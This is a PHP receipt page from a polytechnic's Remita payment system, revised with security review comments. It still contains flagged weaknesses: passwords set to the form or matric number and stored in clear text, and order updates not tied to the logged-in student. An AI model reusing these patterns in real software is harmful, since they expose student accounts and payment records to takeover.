Current File : /var/www/vhosts/federalpolyede.edu.ng/httpdocs_backup/entranceform/receipt-page.php
<?php
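// Start a session only when none is active yet.
if (session_id() == '') {
    session_start();
}
// Read the payment type and form number on every request. The original assigned
// $ptype only inside the branch above, so it was undefined whenever a session
// was already active, and every later comparison on it silently failed.
$ptype = $_SESSION['ptype'] ?? '';
$matNo = $_SESSION['formNo'] ?? '';
// NOTE(review): nothing on this page rejects a request whose session carries no
// formNo; confirm that an access check runs before this script is reached.
require 'remita_constantsAcc.php';
// orderID comes from the query string and is untrusted. Only a plain string is
// accepted: an array value (orderID[]=...) would otherwise be concatenated into
// the gateway URL and the SQL further down as the literal text "Array".
$orderID = "";
if (isset($_GET['orderID']) && is_string($_GET['orderID'])) {
    $orderID = $_GET['orderID'];
}
// Defaults used by the template when no order is looked up.
$response_code = "";
$rrr = "";
$response_message = "";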
//Verify Transaction
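/**
 * Ask the Remita status endpoint for the state of one order.
 *
 * The request is authenticated with a SHA-512 digest of
 * orderId . APIKEY . MERCHANTID, sent as a path segment of the URL.
 *
 * @param string $orderId Order identifier; callers pass the value taken from the query string.
 * @return array|null Decoded JSON response, or null when the request failed or the body was not a JSON object/array.
 */
function remita_transaction_details($orderId){
    $mert = MERCHANTID;
    $api_key = APIKEY;
    // The digest is computed over the raw order id; only the URL path segment is encoded.
    $hash = hash('sha512', $orderId . $api_key . $mert);
    // rawurlencode() keeps a crafted order id from adding path segments or a query string
    // to the gateway URL; it is a no-op for plain alphanumeric ids.
    $url = CHECKSTATUSURL . '/' . $mert . '/' . rawurlencode($orderId) . '/' . $hash . '/' . 'orderstatus.reg';

    $ch = curl_init();
    // Certificate and host name verification stay ON. The original disabled peer verification,
    // which lets anyone on the network path answer as the payment gateway and return a forged
    // "successful" status. If this fails on the host, fix the CA bundle rather than turning it off.
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, true);
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2);
    // Return the body instead of printing it.
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    // Bound the wait so a stalled gateway cannot hold the PHP worker indefinitely.
    curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
    curl_setopt($ch, CURLOPT_TIMEOUT, 30);
    curl_setopt($ch, CURLOPT_URL, $url);

    $result = curl_exec($ch);
    curl_close($ch);

    // curl_exec() returns false on transport or TLS failure; report that as "no response".
    if ($result === false) {
        return null;
    }

    $response = json_decode($result, true);
    // Callers index the result as an array, so anything else is treated as a failed lookup.
    return is_array($response) ? $response : null;
}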
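	// Look the order up at the gateway only when an order id was supplied.
	if ($orderID != null) {
		$response = remita_transaction_details($orderID);
		// A failed request or an unparseable body does not yield an array. In that case the
		// empty defaults stay in place, which the template renders as an unsuccessful
		// transaction, instead of indexing into a non-array value.
		if (is_array($response)) {
			$response_code = $response['status'] ?? '';
			if (isset($response['RRR'])) {
				$rrr = $response['RRR'];
			}
			$response_message = $response['message'] ?? '';
		}
	}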
?>
<html>
<head>
<title></title>
</head>
<body>
<table width="50%" align="center" cellpadding="3" cellspacing="5">
  <tr>
    <td align="center"><img src="../images/edebanner2.png" width="731" height="95"></td>
  </tr>
  <tr>
    <td><fieldset><legend>Payment Detail</legend>
	<div style="text-align: center;">
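		<?php
		// $rrr and $response_message come from the gateway's JSON response and $orderID from the
		// query string. All three are HTML-escaped before being written into the page; the original
		// echoed them raw, which allowed markup in the URL or the response to run in the visitor's browser.
		$rrrHtml = htmlspecialchars((string) $rrr, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
		$orderIdHtml = htmlspecialchars((string) $orderID, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
		$messageHtml = htmlspecialchars((string) $response_message, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');

		// Status codes '01' and '00' are the ones this page treats as a completed payment.
		$isPaid = ($response_code == '01' || $response_code == '00');

		// Values recorded against the order by the database update that follows this block.
		// They were assigned identically in each of the three branches; they are set once here.
		$transApproved = $isPaid ? 'True' : 'False';
		$remitaRRR = $rrr;
		$transDate = date('y/m/d h:i:s a');
		$transStatus = $response_code;
		$transDetail = $response_message;

		if ($isPaid) { ?>
		<h2>Transaction Successful</h2>

		<p><b>Remita Retrieval Reference: </b><?php echo $rrrHtml; ?></p>
		<p><b>Transaction ID: </b><?php echo $orderIdHtml; ?></p>
		<?php
			// The receipt link depends on which fee the session says is being paid.
			if (($ptype ?? '') == 'Acceptance Fee') {
				echo '<a href="../admin_student/print/acceptancePrint.php" target="_blank">Click Here to Print Acceptance Receipt</a>';
			} else {
				echo '   <a href="../admin_student/print/schoolFeePrint.php" target="_blank">Click Here to Print School Receipt</a>';
			}
		} else if ($response_code == '021') { ?>
		<h2>RRR Generated Successfully</h2>
		<p><b>Remita Retrieval Reference: </b><?php echo $rrrHtml; ?></p>
		<?php } else { ?>
		<h2>Your Transaction was not Successful</h2>
		<?php if ($rrr != null) { ?>
		<p>Your Remita Retrieval Reference is <span><b><?php echo $rrrHtml; ?></b></span></p>
		<?php } ?>
		<p><b>Reason: </b><?php echo $messageHtml; ?></p>
		<?php }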
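		// Persist the gateway result, then run the enrolment step that matches the payment type.
		//
		// Every statement below is a prepared statement with bound parameters. The original built
		// each query by interpolating $orderID (query string), $matNo (session) and the gateway
		// response straight into the SQL text, so any of them could alter the statement.
		// Assumes db_connect() returns a PDO instance; the original already called
		// PDOStatement::rowCount() and fetch(PDO::FETCH_BOTH) on its results.
		require_once('../connect.php');
		$db = db_connect();
		require('../filetoU/logFile.php');

		// Values are cast to string so that a missing value is stored as '' exactly as the
		// interpolated SQL stored it, rather than as NULL.
		$paymentType = (string) ($ptype ?? '');
		$studentNo = (string) $matNo;
		$orderRef = (string) $orderID;

		// Prepare, bind and execute one statement; returns the PDOStatement.
		$run = function ($sql, array $params = []) use ($db) {
			$stmt = $db->prepare($sql);
			$stmt->execute($params);
			return $stmt;
		};

		$logD = 'Payment. OrderID: ' . $orderRef . ' PaymentType: ' . $paymentType;
		logDetail($matNo, $logD);

		// NOTE(review): this update runs for whatever orderID the request carries and is not tied
		// to the student in the session; confirm that callers cannot reach orders they do not own.
		$run(
			"UPDATE `fedpoly`.`remitaorder` SET `remitaRRR` = ?, `transDate` = ?, `transStatus` = ?, `transDetail` = ?, `transApproved` = ? WHERE `remitaorder`.`orderID` = ?",
			[(string) $remitaRRR, (string) $transDate, (string) $transStatus, (string) $transDetail, (string) $transApproved, $orderRef]
		);

		if ($paymentType == 'Acceptance Fee') {
			// Acceptance fee: once an approved payment exists for this applicant, copy the
			// applicant into realdata. rowCount() on SELECT is relied on here as in the original.
			$paidCount = $run(
				"select * from remitaorder where regNo = ? and paymentType = 'Acceptance Fee' and transApproved = 'True'",
				[$studentNo]
			)->rowCount();

			if ($paidCount > 0) {
				$applicantStmt = $run("select * from stddata where formNo = ? or jambNo = ?", [$studentNo, $studentNo]);
				$applicant = $applicantStmt->fetch(PDO::FETCH_BOTH);

				if ($applicantStmt->rowCount() > 0) {
					$admittedStmt = $run("select * from admitted where formNo = ?", [$studentNo]);
					$admitted = $admittedStmt->fetch(PDO::FETCH_BOTH);

					if ($admittedStmt->rowCount() > 0) {
						// The manual doubling of apostrophes is gone: bound parameters need no
						// escaping, and doubling would now store the extra quote.
						$names = $applicant['surname'] . ' ' . $applicant['otherNames'];

						// NOTE(review): the initial username and password are both the form number
						// and the password column is written in clear text; a hashed, unique
						// initial credential needs a change coordinated with the login code.
						// NOTE(review): nothing prevents a second insert when this page is
						// reloaded; confirm realdata has a uniqueness constraint on formNo.
						$run(
							"INSERT INTO `fedpoly`.`realdata`
(`sn`, `formNo`, `matNo`, `names`, `course`, `levelID`, `mode`, `state`, `lga`, `dob`, `gsm`, `sex`, `address`, `email`, `usernamea`, `passworda`, `fresher`) VALUES
(NULL, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, 2)",
							[
								$studentNo,
								$studentNo,
								(string) $names,
								(string) $applicant['option'],
								(string) $admitted['levelID'],
								(string) $admitted['mode'],
								(string) $applicant['state'],
								(string) $applicant['lga'],
								(string) $applicant['dob'],
								(string) $applicant['gsm'],
								(string) $applicant['sex'],
								(string) $applicant['address'],
								(string) $applicant['email'],
								$studentNo,
								$studentNo,
							]
						);
					}
				}
			}
		} else {
			// School fees: act only when this order is recorded as an approved School Fees payment.
			// NOTE(review): the check matches on orderID alone, not on the student in the session;
			// confirm whether it should also require the order to belong to $matNo.
			$approvedCount = $run(
				"select orderID from remitaorder where orderID = ? and transApproved = 'True' and paymenttype = 'School Fees'",
				[$orderRef]
			)->rowCount();

			if ($approvedCount > 0) {
				// Repeater handling: step the student's level back by one, once.
				if (isset($_SESSION['repeater']) && $_SESSION['repeater'] == 'Repeater') {
					$repeaterRows = $run(
						"select * from realdata where matNo = ? and status = 'Repeater'",
						[$studentNo]
					)->rowCount();

					// The original subtracted 1 from a $levelID that is never assigned on this
					// path, which wrote -1. The session's levelID (the value this script uses for
					// the student's level below) is used instead, and the update is skipped when
					// it is absent. NOTE(review): confirm the session is the intended source.
					if ($repeaterRows != 1 && isset($_SESSION['levelID']) && is_numeric($_SESSION['levelID'])) {
						$repeatLevel = $_SESSION['levelID'] - 1;
						$run(
							"update realdata set levelID = ?, status = 'Repeater' where matNo = ?",
							[(string) $repeatLevel, $studentNo]
						);
					}
				}

				// Matric number generation for a fresher whose matNo is still the form number.
				$fresherRows = $run(
					"select * from realdata where formNo = ? and matNo = ? and fresher = '2'",
					[$studentNo, $studentNo]
				)->rowCount();

				if ($fresherRows > 0) {
					$deptID = $_SESSION['deptID'];
					$levelID = $_SESSION['levelID'];

					// Prefix comes from the department row, suffix from the level. Both default to
					// '' so an unknown department or level no longer reads undefined variables.
					$prefix = '';
					$sufix = '';
					$deptStmt = $run("select * from dept where sn = ?", [(string) $deptID]);
					$dept = $deptStmt->fetch(PDO::FETCH_BOTH);
					if ($deptStmt->rowCount() > 0) {
						if ($levelID == '1') {
							$prefix = $dept['nd'];
						} elseif ($levelID == '3') {
							$prefix = $dept['hnd'];
						} elseif ($levelID == '5') {
							$prefix = $dept['nd'];
							$sufix = 'PT';
						} elseif ($levelID == '8') {
							$prefix = $dept['nd'];
							$sufix = 'DPT';
						} elseif ($levelID == '10') {
							$prefix = $dept['nd'];
						}
					}

					// Serial number: count of already-numbered students plus one.
					// NOTE(review): count-then-write is not atomic; two payments completing at the
					// same moment can receive the same number. A unique index on matNo or a
					// transaction with row locking would close that gap.
					$numbered = $run("select * from realdata where fresher = '20'")->rowCount();
					if ($numbered > 0) {
						$realNo = $numbered + 1;
						// '2016' followed by the serial, left-padded with zeros to five digits.
						$serialNo = '2016' . str_pad((string) $realNo, 5, '0', STR_PAD_LEFT);
						$newMatNo = $prefix . $serialNo . $sufix;

						// NOTE(review): username and password are both set to the new matric
						// number, in clear text; see the note on the insert above.
						$run(
							"UPDATE `fedpoly`.`realdata` SET `matNo` = ?, `usernamea` = ?, `passworda` = ?, `fresher` = '20' WHERE `realdata`.`formNo` = ?",
							[$newMatNo, $newMatNo, $newMatNo, $studentNo]
						);
						$run(
							"UPDATE `fedpoly`.`remitaorder` SET `regNo` = ? WHERE `remitaorder`.`orderID` = ?",
							[$newMatNo, $orderRef]
						);

						$_SESSION['matNo'] = $newMatNo;
						// The prefix is read from the database, so the value is escaped before output.
						echo '<h2 style="color: #FF0000"><br> Note: Your Username and Password is now '
							. htmlspecialchars($newMatNo, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8') . '</h2>';
					}
				}
			}
		}
		?>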
          <br><a href="../index.php" target="_blank">Back to Home Page</a>
	</div>
    </fieldset>
</td>
  </tr>
</table>
</body>
</html>
